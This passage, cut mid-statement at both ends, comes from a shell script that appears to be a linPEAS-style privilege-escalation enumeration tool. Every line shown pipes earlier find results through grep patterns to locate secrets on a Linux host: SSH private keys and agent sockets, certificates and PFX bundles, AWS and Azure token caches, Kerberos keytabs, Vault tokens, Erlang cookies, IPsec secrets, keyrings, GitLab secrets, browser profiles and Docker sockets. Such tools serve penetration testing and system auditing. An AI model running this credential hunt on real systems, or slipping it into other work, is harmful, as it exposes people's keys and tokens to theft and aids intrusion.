"$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^$GREPHOMESEARCH|^/usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "filelliza$|filezilla\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '/lib' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E 'README.gnupg' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^$GREPHOMESEARCH" | grep -E "\.mozilla$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^$GREPHOMESEARCH" | grep -E "google-chrome$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e 